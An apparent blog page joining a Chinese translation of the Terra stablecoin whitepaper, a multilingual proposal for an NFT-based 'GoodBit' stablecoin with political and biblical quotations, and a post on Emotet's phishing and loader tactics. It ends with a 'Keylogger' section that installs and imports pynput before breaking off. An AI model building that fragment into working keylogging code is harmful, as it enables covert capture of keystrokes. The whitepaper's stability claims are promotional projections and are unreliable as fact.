Terra 协议解决这些问题的核心理念是,具有弹性货币政策的加密货币将保持稳定的价格,保留比特币的所有抗审查性,并使其可用于日常交易。然而,价格稳定性不足以广泛采用一种货币。货币本质上具有强大的网络效应:除非有足够数量的商户准备好接受,否则客户不太可能转向新货币,但与此同时,商户没有理由投入资源和教育员工接受新货币除非有大量客户需求。出于这个原因,比特币在支付领域的采用仅限于自行投资于加密货币的小企业的所有者。我们的信念是,虽然弹性货币政策是解决稳定性问题的方法,但有效的财政政策可以推动采用。此外,Terra 协议通过有效的财政支出制度为用户加入网络提供了强有力的激励,该制度由财政部管理,多个刺激计划竞争融资。也就是说,来自社区参与者的提案将由生态系统的其他部分进行审查,一旦获得批准,他们将获得资金,以增加采用率并扩大潜在的用例。Terra 协议在促进稳定性和采用之间取得平衡,代表了法定货币作为支付和价值储存手段的有意义的补充。

本文的其余部分安排如下。我们首先讨论协议以及如何通过校准矿工需求和使用原生挖矿 Luna 代币来实现和保持稳定性。然后,我们深入研究如何采用稳定的挖矿激励措施来消除经济性波动。最后,我们讨论了如何采用 Terra 的财政政策来有效激励推动代币的采用。

2 多法币挂钩货币政策

稳定币机制必须回答三个关键问题:

  • 如何定义价格稳定性?稳定性是一个相对的概念;为了吸引尽可能广泛的受众,稳定币应该与哪种资产挂钩?
  • 如何衡量价格稳定性?代币价格对于 Terra 区块链来说是外生的,有效、防腐败的价格反馈对于系统正常运行是必要的。
  • 如何实现价格稳定?当代币价格偏离目标时,系统需要一种方式向市场施加压力以使价格回到目标。

本节将详细说明 Terra 对上述问题的回答。

2.1 定义相对于区域法定货币的稳定性

稳定币的存在目标是保持其购买力。鉴于大多数商品和服务都是在国内消费的,因此创建跟踪当地法定货币价值的加密货币非常重要。尽管美元主导着国际贸易和外汇交易,但对于普通消费者来说,美元相对于他们所选择的记账单位表现出不可接受的波动性。

认识到货币的强大区域性,Terra 旨在成为一个与世界主要货币挂钩的加密货币家族。创世之后不久,该协议将发行与美元、欧元、人民币、日元、英镑、韩元和国际货币基金组织特别提款权(IMF SDR)挂钩的 Terra 货币。随着时间的推移,更多的货币将通过用户投票添加到列表中。TerraSDR 将成为该家族的旗舰货币,因为它对任何一种法定货币的波动性最低(Kereiakes,2018 年)。TerraSDR 是交易费用、矿工奖励和刺激赠款的计价货币。

然而,重要的是 Terra 货币能够获得共享流动性。出于这个原因,系统支持 Terra 货币之间以市场汇率进行的原子互换。用户可以立即以有效的韩元/美元汇率将 TerraKRW 换成 TerraUSD。这允许所有 Terra 货币共享流动性和宏观经济波动;一种货币的需求下降可以很快被其他货币吸收。因此,我们可以推断一组 Terra 货币的稳定性;在本文的其余部分,我们将松散地将 Terra 称为单一货币。随着 Terra 的生态系统添加更多货币,其原子交换功能可以成为跨境交易和国际贸易结算的即时解决方案。

2.2 用矿工预言机衡量稳定性

由于 Terra 货币在二级市场的价格对区块链来说是外生的,因此系统必须依靠去中心化的价格预言机来估计真实汇率。我们将价格预言机的机制定义如下:

  • 对于货币集合中的任何 Terra 子货币 C = TerraKRW, TerraUSD, TerraSDR… 矿工提交他们所认为的目标法定货币的当前汇率的投票。
  • 每 n 个区块,统计投票,将加权中值作为真实汇率。
  • 一定数量的 Terra 会奖励给那些在被选出的中位数 1 个标准差范围内投票的人。那些在此范围之外投票的人可能会受到削减其质押的惩罚。每次投票时,系统可能会校准受到惩罚和奖励的比例,以确保有足够多的矿工投票。

在实施去中心化预言机时已经提出了几个问题,但其中最主要的问题是选民有可能通过协调虚假价格投票来获利。将投票限制在对系统具有强烈既得利益的特定用户子集,即矿工,可以大大降低这种协调的可能性。价格预言机上的成功协调事件将导致矿工质押价值的损失比任何潜在收益都要高得多,因为 Luna 质押对系统是时间锁定的。 预言机还可以在添加和弃用 Terra 货币方面发挥作用。当预言机投票支持新的 Terra 货币满足提交阈值时,该协议可能会开始支持新的 Terra 货币。同样,在几个时期内未能获得足够数量的预言机投票可能会触发 Terra 货币的弃用。

2.3 通过一致的挖矿奖励实现稳定性

一旦系统检测到 Terra 货币的价格偏离其挂钩,它必须施加压力以使价格正常化。与任何其他市场一样,Terra 货币市场遵循挂钩货币的简单供需规则。即:

  • 在所有条件相同的情况下,收缩货币供应量将导致更高的相对货币价格水平。也就是说,当价格水平低于目标时,充分减少货币供应将将使价格水平恢复正常。
  • 在所有条件相同的情况下,扩大货币供应量将导致较低的相对货币价格水平。也就是说,当价格水平高于目标时,充分增加货币供应量将使价格水平恢复正常。

当然,紧缩货币供应不是免费的。像任何其他资产一样,资金需要从市场上购买。中央银行和政府通过各种机制承担锚定法币系统的收缩成本,包括干预、发行债券和短期工具从而产生利息支出,以及提高货币市场利率和准备金率要求从而损失税收。换句话说,中央银行和政府吸收了它们发行的挂钩货币的波动性。 类似地,Terra 矿工吸收了 Terra 供应的波动性。

  • 在短期内,矿工通过挖矿权利的稀释来吸收 Terra 收缩成本。在收缩期间,系统会铸造和拍卖更多的挖矿权利来回购和销毁 Terra。这会收缩 Terra 的供应,直到其价格回到挂钩,并暂时导致挖矿权利的稀释。
  • 从中长期来看矿工将获得增加的挖矿奖励。一、系统继续回购挖矿权利,直到达到固定目标供应,从而对可用挖矿权利产生长期可靠性。其次,系统增加了挖矿奖励,后面会详细介绍。

总之,矿工在短期内承担 Terra 波动的成本,同时在长期内得到补偿。与普通用户相比,矿工对系统的稳定性有着长期的既得利益,拥有投资的基础设施、训练有素的员工和高转换成本的商业模式。本节的其余部分将讨论该系统如何吸收短期波动并为 Terra 矿工创造稳定的长期激励。

2.4 矿工吸收短期 Terra 波动

Terra 协议在权益证明(PoS)区块链上运行,矿工需要质押原生加密货币 Luna 来挖掘 Terra 交易。在每个区块周期,协议从一组质押矿工中选出一个区块生产者,该区块生产者负责通过聚合交易、达成矿工之间的共识以及确保消息在短时间内具有高容错性地正确分发来产生下一个区块所需的工作。

区块生产者选举由活跃矿工的 Luna 质押大小加权。因此,Luna 代表 Terra 网络中的挖矿权利。类似于比特币矿工的哈希算力代表按比例生成比特币区块的几率,Luna 质押代表按比例生成 Terra 区块的几率。

Luna 也是抵御 Terra 价格波动的最直接防御措施。该系统使用 Luna 为 Terra 定价,同意成为希望以 Terra 的目标汇率交换 Terra 和 Luna 的任何人的对手方。更具体地说:

  • 当 TerraSDR 的价格 < 1 SDR 时,用户和套利者可以向系统发送 1 TerraSDR 并获得价值 1 SDR 的 Luna。
  • 当 TerraSDR 的价格 > 1 SDR 时,用户和套利者可以向系统发送价值 1 SDR 的 Luna 并获得 1 TerraSDR。

无论市场状况如何,系统都愿意尊重目标汇率,从而使 Terra 的市场汇率保持在目标汇率附近的窄幅区间。当 1 TerraSDR = 0.9 SDR 时,套利者可以通过从系统中将 TerraSDR 换成价值 1 SDR 的 Luna 来获取无风险利润,而她可以从公开市场获得价值 0.9 SDR 的资产。同样,当 1 TerraSDR = 1.1 SDR 时,她也可以通过将价值 1 SDR 的 Luna 交到系统中,从而获得价值 1.1 SDR 的 TerraSDR,再次击败公开市场的价格,来获取无风险利润。

系统通过 Luna 为 Terra 定价提供资金:

  • 通过购买 1 TerraSDR,协议铸造并出售价值 1 SDR 的 Luna
  • 通过出售 1 TerraSDR,协议获取价值 1 SDR 的 Luna

由于铸造 Luna 以匹配 Terra 供应,波动性从 Terra 价格转移到 Luna 供应。如果不加以缓解,这种 Luna 稀释会给矿工带来问题;他们的 Luna 质押只值收缩后总可用挖矿权利的一小部分。该系统会销毁它在货币供应量扩大期间获得的 Luna 的一部分,直到 Luna 供应量达到其 10 亿平衡发行量。因此,Luna 作为一种代币,可以长期拥有稳定的需求,并按比例获得 Terra 挖矿的权利。下一节将讨论该系统如何提供稳定的挖矿激励措施,以在动荡的宏观经济周期中保持挖矿市场和 Luna 需求的长期稳定。

2.5 矿工获得长期稳定的奖励

矿工在 Terra 的安全和稳定中发挥着基础性作用。他们通过参与 PoS 共识来提供前者。它们通过吸收 Terra 需求的短期波动来提供后者。稳定的挖矿需求是安全和稳定的核心要求。为了实现这一目标,该协议旨在在所有经济条件、繁荣和萧条中提供稳定和可预测的回报。当网络能够始终如一地补偿保护它的人时,网络是最好的。

该协议有两种奖励矿工工作的方式:

  • 交易费用:所有 Terra 交易向矿工支付少量费用。费用默认为 0.1%,上限为 1%,这意味着在电子商务中用 Terra 进行交易将比使用信用卡等传统支付方式进行交易便宜得多。[1]
  • 铸币税(销毁 Luna):当对 Terra 的需求增加时,系统会反过来铸造 Terra 并获取 Luna。这称为铸币税——新铸造货币的价值减去发行成本(在这种情况下为零)。系统会销毁一部分获取的 Luna,这使得挖矿权利更加稀缺。铸币税的剩余部分进入财政部,为财政刺激提供资金。

[1]:每笔交易的费用上限为 1 SDR(在撰写本文时为 1.39 USD),这意味着较大的交易支付的费用也比传统的电汇要少得多。

为了从矿工的角度理解奖励,我们需要通过基本的计算来确定在 Terra 网络上进行长期挖矿贡献的可行性。在固定成本之后,单个挖矿权利(1 Luna)的挖矿业务的利润(或亏损)归结为奖励减去该单位的工作成本。更正式一点,在未来的工作周期 $t$ 内,单位挖矿权利的损益等于

$$P(t) = {TotalRewards(t) \over LunaSupply(t)} - UnitMiningCost(t)$$

损益之间的频繁交替——正数和负数的 $P(t)$ ——会产生高度不稳定的挖矿需求。该协议的目标是使这种计算更容易和更可预测。考虑到这一点,$P(t)$ 中的大部分不确定性归结为第一项,即单位挖矿奖励。因此,单位挖矿奖励是对网络做出长期贡献的主要考虑因素。稳定的单位挖矿奖励产生稳定的挖矿需求,而波动的单位挖矿奖励则相反。

默认情况下,总奖励(来自费用)和 Luna 的供应都存在不确定性,因此这两项都会导致单位奖励的波动。首先,当经济增长时,费用奖励往往会增加,而当经济萎缩时,费用奖励往往会减少。其次,Luna 供应量在经济增长时趋于减少(因为 Luna 因铸币税而销毁),而在经济萎缩时趋于增加(因为发行新的 Luna 以回购 Terra)。这意味着单位挖矿奖励倾向于朝着经济方向强烈波动,无论是向上还是向下。由此类推,这也适用于挖矿需求。

因此,为了创造长期稳定的挖矿需求,该协议会在所有经济条件下创造可预测的回报。为了实现这一点,该协议使用交易费用和 Luna 销毁率作为杠杆来抵抗单位挖矿奖励的变化。交易费用会影响总奖励,而 Luna 销毁率会影响 Luna 供应——这是单位挖矿奖励的两个决定因素。基本逻辑如下:

  • 如果单位挖矿奖励增加:
    • 减少费用
    • 减少 Luna 销毁
  • 如果单位挖矿奖励减少:
    • 增加费用
    • 增加 Luna 销毁

在努力消除矿工奖励的波动的同时,该协议还以稳定增长为目标,与 Terra 经济的长期增长保持一致。这是对他们长期致力于为网络服务的自然回报。

为了将这些想法正式化,我们更详细地讨论了平滑单位挖矿奖励的机制。[2]费用和 Luna 销毁率——“稳定性杠杆”——每周都会根据单位挖矿奖励的变化进行调整。我们将 Luna 销毁率定义如下:与存入财政部相比,协议使用多少部分 (%) 的铸币税来回购和销毁 Luna?设 $f_t$、$b_t$ 和 $R_t$ 分别为 $t$ 时刻的交易费用、Luna 销毁率和单位挖矿奖励。那么调整 $f$ 和 $b$ 值的规则如下:

$$f_{t+1} = (1 + g) \cdot {R_{t-1} \over R_t} \cdot f_t$$$$b_{t+1} = (1 + g) \cdot {R_{t-1} \over R_t} \cdot b_t$$

[2]:我们提出的机制略有简化。我们省略了一些细节,例如,该协议在挖矿奖励中使用移动平均线来提高稳健性,并确保在所有情况下回购相对于费用的贡献始终如一。

现在更新规则应该明确了当我们说费用(和 Luna 销毁率)抵抗单位挖矿奖励的变化时,我们的意思是:当前值 $f_t$ 乘以单位挖矿奖励的反向变化 ${R_{t-1} \over R_t}$。例如,如果单位挖矿奖励减半,则费用将相应加倍,反之,如果单位挖矿奖励加倍,费用将相应减半。结果由一个小的增长因子 $1 + g$ 来衡量,它允许与经济的长期增长率相称的单位挖矿奖励逐渐增长。

该机制在实践中的效果如何?我们已经运行了广泛的模拟来进行压力测试并在广泛的假设下对其进行改进。在下文中,我们将分享并讨论一个对机制施加重大压力并阐明其如何实现其目标的代表性示例。我们考虑了一个模拟的 10 年期间,在此期间 Terra 经济经历了快速增长和严重动荡。我们展示了该协议如何根据经济状况调整其稳定性杠杆,以及这些调整如何反过来塑造单位挖矿奖励。

In [ ]:
from IPython.display import display
from PIL import Image

display(Image.open('Terra-Whitepaper.png'))

第一张图显示了模拟的每周交易量及其年度移动平均值。交易量可以被认为是 Terra 经济的 GDP。经济经历了快速增长,随后是严重的多年衰退,在 3 年内摧毁了 93% 的 GDP,需要 6 年才能完全恢复。这种情况是一个严峻的考验——如果它描述的是比特币的价格,那将是迄今为止其历史上最长的熊市,并且在回撤方面并列最差(相当于 2011 年 6 月至 11 月的 93% 的回撤)。虽然我们认为 Terra 的采用驱动需求将比比特币的投机驱动需求稳定得多,但稳定性机制的设计旨在自信地承受比特币级别的波动。

第二张图显示了交易费用和 Luna 销毁率,这是协议用来消除单位挖矿奖励波动的两个杠杆。我们观察到两者都与经济方向相反(这也是单位挖矿奖励的默认方向)。

第三张图显示了单位挖矿奖励的年度移动平均值。我们在这个例子中设定的增长目标是每年 15%。按照设计,单位挖矿奖励经历稳定增长且波动性低,不受 Terra GDP 周期的影响。费用和 Luna 销毁率的调整成功地吸收了单位挖矿奖励的预期波动并创造了可预测的增长。这是通过平均低于 0.5% 的费用(最高 1% 的瞬时峰值)和平均大约 50% 的 Luna 销毁率(意味着平均 50% 的铸币税授予财政部)来实现的。

稳定的挖矿需求是 Terra 安全稳定的核心要求。单位挖矿奖励是矿工的首要考虑因素,也是最大的风险来源。默认情况下,它们具有高度周期性,因此具有高度不确定性。在动荡的条件下减少这种不确定性是稳定挖矿需求的关键。我们已经概述了一个简单的机制,它使用交易费用和 Luna 销毁率作为杠杆来实现这一目标,并证明了它在最严峻的经济条件下的有效性。

3 增长驱动的财政政策

尽管智能合约具有巨大的潜力,但由于其基础货币的价格波动,智能合约在采用方面面临障碍。价格波动使得智能合约无法用于大多数主流金融应用程序,因为大多数用户习惯于评估保险、信贷、抵押和工资单中的确定支出。Terra 将提供一个稳定的 dApp 平台,旨在构建使用 Terra 作为其底层货币的金融应用程序,从而使智能合约成熟为主流业务的有用基础设施。Terra 平台 DApps 将通过多样化其用例来帮助推动增长并稳定 Terra 货币家族。在本节中,我们将讨论该协议如何通过其增长驱动的财政政策来补贴更成功的应用程序的增长。

各国政府使用扩张性财政支出来刺激增长。财政支出的希望在于,原始支出引发的经济活动会形成一个反馈循环,使经济增长超过最初刺激措施中花费的金额。这个概念被支出乘数所捕捉——一美元的财政支出会产生多少美元的经济活动?支出乘数随着边际消费倾向的增加而增加,这意味着扩张性刺激的有效性与经济主体增加支出的可能性直接相关。

在上一节中,我们讨论了 Terra 铸币税是如何同时用于矿工奖励和财政部的。在这一点上,值得一提的是,财政部究竟如何实施 Terra 的财政支出政策,其核心任务是在确保 Terra 稳定的同时刺激 Terra 的增长。通过这种方式,Terra 通过将未分配用于稳定的铸币税返还给其用户来实现更高的效率。

财政部的主要重点是将来自铸币税的资源分配给去中心化应用程序(dApp)。要从财政部获得铸币税,dApp 需要注册为在 Terra 网络上运营的实体。dApp 有资格获得资金,具体取决于其经济活动和资金使用情况。

dApp 的融资程序如下:

  • dApp 向财政部申请账户;该应用程序包括元数据,例如标题、指向有关资金使用的详细页面的 URL、申请人的钱包地址以及审计和治理程序。
  • 定期投票,Luna 验证人投票决定接受或拒绝新的 dApp 资金账户申请。净投票数(赞成票减去反对票)需要超过总可用验证人权力的 $1/3$ 才能被接受。
  • Luna 验证者可以控制哪些 dApp 可以在财政部开立账户。资金本身是由验证者根据分配给每个 dApp 的权重对每个资金周期进行投票来确定的。这使财政部能够优先考虑获得最多资金的 dApp。
  • 在每次投票会议上,Luna 验证者有权要求将 dApp 列入黑名单,例如,因为它行为不诚实或未能说明其使用国库资金的情况。再次,净票数(赞成票减去反对票)需要超过总可用验证者权力的 $1/3$ 才能强制执行黑名单。被列入黑名单的 dApp 无法访问其国库账户,并且不再有资格获得资金。

为 dApp 分配资金权重的动机是通过奖励更有可能对经济产生积极影响的 dApp 来最大化刺激对经济的影响。财政部使用两个标准来确定支出分配:(1) 强劲的经济活动和 (2) 有效利用资金。具有良好采用记录的 dApp 因其持续成功而获得支持,而相对于其资金增长的 dApp 将获得更多的铸币税奖励,因为它们在有效利用其资源方面有着成功的记录。

这两个标准组合成一个权重,确定 dApp 从总资金池中获得的相对资金。例如,权重为 $2$ 的 dApp 将获得权重为 $1$ 的 dApp 的两倍资金。

我们列出资金权重方程,然后对所有部分进行详细说明:对于时间段 $t$,令 $TV_t$ 为 dApp 的交易量, $F_t$ 为收到的财政部资金。然后,协议确定该期间的资金权重 $w_t$ 如下:

$$w_t = (1 - \lambda) TV_t^* + \lambda {\Delta TV_t^* \over F_{t-1}^*}$$

符号 $*$ 表示移动平均线,因此 $TV_t^*$ 将是交易量直到时间段 $t$ 的移动平均线,而 $\Delta TV_t^*$ 将是直到时间段 $t$ 的不同长度的移动平均线的差异。例如,可以按季度制作平均窗口。最后,所有 dApp 的资金权重总和为 1。

  • 第一项与 $TV_t^*$ 成正比,即 dApp 在最近过去产生的平均交易量。这是 dApp 经济活动的指标,或者更简单地说是其微观经济的规模。
  • 第二项与 $\Delta TV_t^* / F_{t-1}^*$ 成正比。分子描述了交易量的趋势——它是最近的平均值和最近的平均值之间的差异。当其为正时,这意味着交易量呈上升趋势,反之亦然。分母是 dApp 在最近一段时间内收到的平均资金金额,包括上一时期。所以第二个术语描述了经济活动相对于过去的资金是如何变化的。总体而言,该比率的较大值捕获了 dApp 因其收到的每一美元资金而快速增长的情况。这实际上是资金计划的支出乘数,是资金效率的主要指标。
  • 参数 $\lambda$ 用于确定经济活动和融资效率的相对重要性。如果将其设置为 $1/2$,则这两项将具有相同的贡献。通过降低 $\lambda$ 的值,该协议可以更倾向于具有更大经济体的 dApp。相反,通过增加 $\lambda$ 的值,该协议可以有利于那些高效使用资金的 dApp,例如在资金较少的情况下快速增长,即使它们的规模较小。

以程序化方式分配资金的一个重要优势是,与开放式投票系统相比,它更简单、客观、透明和精简。事实上,与去中心化投票系统相比,它更具可预测性,因为用于计算资金权重的输入是透明的且移动缓慢。此外,该系统对 Luna 验证者的信任度较低,因为他们所拥有的唯一权力是确定 dApp 是否诚实并合法使用资金。

总体而言,Terra 治理的目标很简单:为对经济产生最大净影响的组织和提案提供资金。这将包括 dApp 为用户解决实际问题,增加 Terra 的采用率,从而增加 Terra 经济的 GDP。

4 结论

我们介绍了 Terra,一种稳定的数字货币,旨在补充现有的法定货币和加密货币,作为交易和存储价值的一种方式。该协议根据需求变化调整 Terra 的供应以保持其价格稳定。这是使用 Luna 实现的,Luna 是一种挖矿代币,其稳定的奖励旨在吸收不断变化的经济周期带来的波动。Terra 还通过将未投资于稳定性的铸币税返还给用户来实现有效的采用。其透明和民主的分配机制使 dApps 能够通过利用 Terra 的经济增长来吸引和留住用户。

如果比特币对加密货币的贡献是不变性,而以太坊是表达性,那么我们增加的贡献将是可用性。Terra 的潜在应用是巨大的。即刻,我们预见 Terra 将被用作在线支付的交换媒介,允许人们以其他支付方式收取的费用的一小部分自由地进行交易。由于世界开始变得越来越去中心化,我们看到 Terra 被用作 dApp 平台,价格稳定的代币经济建于其上。Terra 正在寻求成为区块链上第一个可用的货币和稳定平台,为主流用户、商家和开发人员释放去中心化的力量。

参考资料

Liu, Yukun 和 Tsyvinski, Aleh,加密货币的风险和回报(2018 年 8 月)。 NBER 工作文件第 w24877 号。可在 https://ssrn.com/abstract=3226806 获得。

Makarov、Igor 和 Schoar、Antoinette,加密货币市场中的交易和套利(2018 年 4 月 30 日)。可在 SSRN 获得:https://ssrn.com/abstract=3171204

Kereiakes、Evan,将多种法定货币纳入 Terra’s Peg 的基本原理(2018 年 11 月)。可在 https://medium.com/terra-money/rationale-for-including-multiple-fiat-currencies-in-terras-peg-1ea9eae9de2a 获得。

Taylor、John B. (1993) 。 “实践中的自由裁量权与政策规则”。卡内基-罗切斯特公共政策系列会议。 39:195-214。

Read More

2022-02-25
Declaration of the Independence of Cyberspace

The project we want to do is called “typography” or “digitypography”. The purpose is to build a new stablecoin system. $Typography and $GoodBit is the main currency pair in the system. The stabilization mechanism is to control the supply of $GoodBit by burning a certain amount of $Typography to mint one $GoodBit or minting a certain amount of $Typography to burn one $GoodBit, so that one $GoodBit can be paid on average for the purpose of copying and quoting one bit of NFT content. Specifically, the “General Knowledge Graph” should be implemented in the form of “Directed Acyclic Graph”, and version control should be implemented for all NFT content in the system. Each specific version of NFT is similar to one commit in git version control system. The owner of the NFT can issue the corresponding CQLTs (Copy and Quote License Tokens). Others can buy and burn multiple different CQLTs to mint their own NFT. This new NFT is then connected as a successor node to the corresponding NFTs of those CQLTs, so as to realize the historical proof of NFT merges and changes. This huge NFT graph is stored in a permanent way. And then all the transaction records of CQLTs and $GoodBits are used to control the issuance of $GoodBits. Specifically, we need to track the circulation of each CQLT. Each CQLT has a price in $GoodBit based on its latest transaction or destruction record. Track all the CQLTs, the sum of their prices in $GoodBits, divided by the sum of the bits of their corresponding NFT content, we can obtain the average price in $GoodBit for copying and quoting one bit of NFT content on average within the whole system. In addition, we know the price of one $GoodBit in $Typography in the trading market of $GoodBit and $Typography. Therefore, we can calculate the average price in $Typography for copying and quoting one bit. The stability mechanism of the whole system is to achieve the purpose of adjusting the average price of copying and quoting one bit to one $GoodBit by allowing a two-way free burning and minting of one $GoodBit with a certain amount of $Typography required for copying and quoting one bit on average.

人类走出「前商品货币」的阶段经历了上千年,走出「商品货币」的阶段经历了约 200 年,目前正经历「信用货币」的阶段,至今时间约为 50 年。

加密货币行业以 2015 年 Bitfinex 上线 USDT 交易山寨币取代了 BTC 作为山寨币交易对为时间点,标志着行业已经走出了「前商品货币」的阶段;目前 Binance 交易所发行了自己的 BUSD,Terra 发行了 UST,以及诸如 MIM、OHM 等算法稳定币,标志着行业逐渐进入文中「商品货币」的阶段;可以预见未来不管监管的尺度松紧,行业一定会进入文中「信用货币」的阶段。¹

¹ => STABLECOIN AS A WEAPON

我们想做的项目叫做“印刷术”(typography、digitypography)。目的是构建一个基于开放式博弈的生态型稳定币系统。“印刷术”($Typography)和“好比特”($GoodBit)是其中一对货币对。稳定机制是通过销毁一定量的“印刷术”铸造一个“好比特”或者销毁一个“好比特”铸造一定量的“印刷术”来控制“好比特”的发行量,以达到一个“好比特”在一般水平上可以用来购买一个比特量的 NFT 内容的“复制引用权”的目的。具体来说,要用“有向无环图”(DAG)的方式实现“通用知识图谱”,对所有的 NFT 的内容实现版本控制。每一个特定的版本的 NFT 类似 git 里面的 commit。NFT 的所有者可以发行相应的“复制引用许可代币”(Copy and Quote License Token)。其他的人可以购买并销毁多个不同的“复制引用许可代币”来铸造自己的 NFT。这个新的 NFT 就以后继节点的方式连接到那些“复制引用许可代币”相应的 NFT 之后,以实现 NFT 的合并和更改的历史证明。这个巨大的 NFT 图谱以永存的方式存储。而所有“复制引用许可代币”和“好比特”的交易记录被用来控制“好比特”的发行量。具体来说,要追踪每一个“复制引用许可代币”的流通。每一个“复制引用许可代币”根据其最新的交易或者销毁记录,有一个以“好比特”计价的价格。追踪所有的“复制引用许可代币”,它们以“好比特”计价的价格的总和、除以、它们相应的 NFT 内容的比特量的总和,可以得到、整个系统之内、复制引用一个比特以“好比特”计价的平均价格。另外,我们知道“印刷术”与“好比特”的交易市场中,一个“好比特”以“印刷术”计价的价格。因此,我们可以算出、复制引用一个比特以“印刷术”计价的平均价格。整个系统的稳定机制是,通过允许、一个“好比特”与复制引用一个比特在一般水平上所需支付的“印刷术”的、双向自由的销毁铸造,来达到、把复制引用一个比特的平均价格调整为一个“好比特”、的目的。

私たちがやりたいプロジェクトは「タイポグラフィ」(typography)、「デジタイポグラフィ」(digitypography)と呼ばれています。目的は、新しいステーブルコインシステムを構築することです。「印刷術」($Typography)と「良いビット」($GoodBit)はその中に主な通貨ペアです。

価格安定化メカニズムは、「良いビット」を鋳造するために一定量の「印刷術」を焼却するか、「良いビット」を焼却するために一定量の「印刷術」を鋳造することによって、「良いビット」の発行量を制御することです。これにより、一般的に、一個ビットの NFT コンテンツをコピーして参照するために、一個「良いビット」で支払うことができます。

具体的には、「一般知識グラフ」というのを、「有向非巡回グラフ」(DAG)の形式で実装する必要があり、バージョン管理はすべての NFT コンテンツに実装する必要があります。NFT の各特定のバージョンは、git でのコミットに似ています。

NFT の所有者は、その NFT に対応する「コピー参照ライセンストークン」(Copy and Quote License Token)を発行できます。

他の人は、複数の異なる「コピー参照ライセンストークン」を購入して焼却し、自分の NFT を鋳造することができます。次に、その新しい NFT は、後続ノードの形式で「コピー参照ライセンストークン」に対応する NFT に接続され、NFT の合併と変更の歴史を証明します。

この巨大な NFT グラフは、永続的な方法で保存されます。また、「コピー参照ライセンストークン」と「良いビット」のすべての取引履歴は、「良いビット」の発行を制御するために使用されます。

具体的には、各「コピー参照ライセンストークン」の流通を追跡します。各「コピー参照ライセンストークン」には、最新の取引または焼却の記録に基づいた「良いビット」で表される価格があります。

すべての「コピー参照ライセンストークン」を追跡して、システム全体で一個ビットをコピーして参照するためにの「良いビット」で表される平均価格は、「良いビット」で表される価格の合計を、対応する NFT コンテンツのビットの合計で、割ったものです。

さらに、私たちは、「印刷術」と「良いビット」の取引市場によって、一個「良いビット」が「印刷術」で表される価格を知っています。したがって、一個ビットをコピーして参照するためにの「印刷術」で表される平均価格を計算できます。

システム全体の価格安定メカニズムは、一個「良いビット」と、一個ビットをコピーして参照するために一般的に必要とされる「印刷術」を、自由に鋳造と焼却を可能にすることによって、ビットをコピーして参照する平均価格を一個「良いビット」に調整する目的を達成します。

不可偷窃。
(出埃及记 20:15 吕振中)

我们认为下面这些真理是不证自明²的:人人生而平等,造物主赋予他们若干不可剥夺的权利,其中包括生命权、自由权和追求幸福的权利。为了保障这些权利,人们才在他们之间建立政府,而政府之正当权力,则来自被统治者的同意。任何形式的政府,只要破坏上述目的,人民就有权利改变或废除它,并建立新政府;新政府赖以奠基的原则,得以组织权力的方式,都要最大可能地增进民众的安全和幸福。的确,从慎重考虑,不应当由于轻微和短暂的原因而改变成立多年的政府。过去的一切经验也都说明,任何苦难,只要尚能忍受,人类都宁愿容忍,而无意废除他们久已习惯了的政府来恢复自身的权益。但是,当政府一贯滥用职权、强取豪夺,一成不变地追逐这一目标,足以证明它旨在把人民置于绝对专制统治之下时,那么,人民就有权利,也有义务推翻这个政府,并为他们未来的安全建立新的保障。
ーー《美国独立宣言》前言³

²:英语:Self-evidence
³:任东来在《美国历史文献选集》的译文(中国翻译出版公司翻译,美国驻华大使馆新闻文化处出版,1985)和《1765——1917年的美国》的译文(谢德风等选择,北京三联书店,1957)基础上重译。任东来; 陈伟; 白雪峰; Charles J. McClain; Laurene Wu.

系统地提出三权分立之原则来源于1748年法国孟德斯鸠的《论法的精神》,权力分离为司法权、立法权、行政权三种权力。
所谓三权分立,就是通过法律规定,将三种权力分别交给三个不同的国家机关执掌,既保证各自的权限,又要相互制约保持平衡。

因为永恒主是审判我们的,
永恒主是给我们定律例的,
永恒主是我们的王;
是他在救助我们。
(以赛亚书 33:22 吕振中)

孟德斯鸠是一个基督徒政治哲学家。他的政治哲学来自《圣经》,他必然将《圣经》原则融会贯通在他的三权分立的思想中。《圣经》以赛亚书、第33章、第22节,这一节经文就是将权力分为审判者、立法者和君王,是确立现代三权分立原则的原型。

孟德斯鸠说:“一切有权力的人都会滥用权力,这是万古不易的经验。要防止滥用权力,就必须以权力约束权力。”
孟德斯鸠将权力制衡的基本理论归结为两个基本思想:

  1. 不受约束的权力必然腐败,绝对的权力导致绝对的腐败。
  2. 道德约束不了权力,权力只有用权力来约束。
Read More

2021-11-12
Research of Emotet

Spread via Word documents

通过 Word 文档传播

The EMOTET group managed to take email as an attack vector to a next level. Through a fully automated process, EMOTET malware was delivered to the victims’ computers via infected e-mail attachments. A variety of different lures were used to trick unsuspecting users into opening these malicious attachments. In the past, EMOTET email campaigns have also been presented as invoices, shipping notices and information about COVID-19.

All these emails contained malicious Word documents, either attached to the email itself or downloadable by clicking on a link within the email itself. Once a user opened one of these documents, they could be prompted to “enable macros” so that the malicious code hidden in the Word file could run and install EMOTET malware on a victim’s computer.

EMOTET 群体成功将电子邮件作为攻击向量提升到了一个新水平。通过完全自动化的过程,EMOTET 恶意软件通过感染的电子邮件附件传递到受害者的计算机上。各种不同的诱饵被用来欺骗毫无戒备的用户打开这些恶意附件。过去,EMOTET 的电子邮件活动也曾被伪装成发票、运输通知和有关 COVID-19 的信息。

所有这些电子邮件都包含恶意的 Word 文档,文档要么附在电子邮件中,要么通过点击邮件中的链接下载。一旦用户打开了这些文档,他们可能会被提示『启用宏』,以便隐藏在 Word 文件中的恶意代码可以运行,并在受害者的计算机上安装 EMOTET 恶意软件。

Attacks for hire

雇佣攻击

EMOTET was much more than just a malware. What made EMOTET so dangerous is that the malware was offered for hire to other cybercriminals to install other types of malware, such as banking Trojans or ransomwares, onto a victim’s computer.

This type of attack is called a ‘loader’ operation, and EMOTET is said to be one of the biggest players in the cybercrime world as other malware operators like TrickBot and Ryuk have benefited from it.

Its unique way of infecting networks by spreading the threat laterally after gaining access to just a few devices in the network made it one of the most resilient malware in the wild.

EMOTET 不仅仅是一种恶意软件。EMOTET 之所以危险,是因为它被提供给其他网络犯罪分子,用于在受害者的计算机上安装其他类型的恶意软件,如银行木马或勒索软件。

这种类型的攻击被称为『加载程序』操作,EMOTET 被认为是网络犯罪世界中的最大玩家之一,因为其他恶意软件操作员如 TrickBot 和 Ryuk 从中受益。

它通过在网络中获得访问权限后横向传播威胁的独特方式,使其成为最具弹性的恶意软件之一。

Emotet Malware

Emotet 恶意软件

网络钓鱼:带有恶意链接的鱼叉式钓鱼

Keylogger

键盘记录器

python -m pip install pynput
In [1]:
from pynput import keyboard
In [2]:
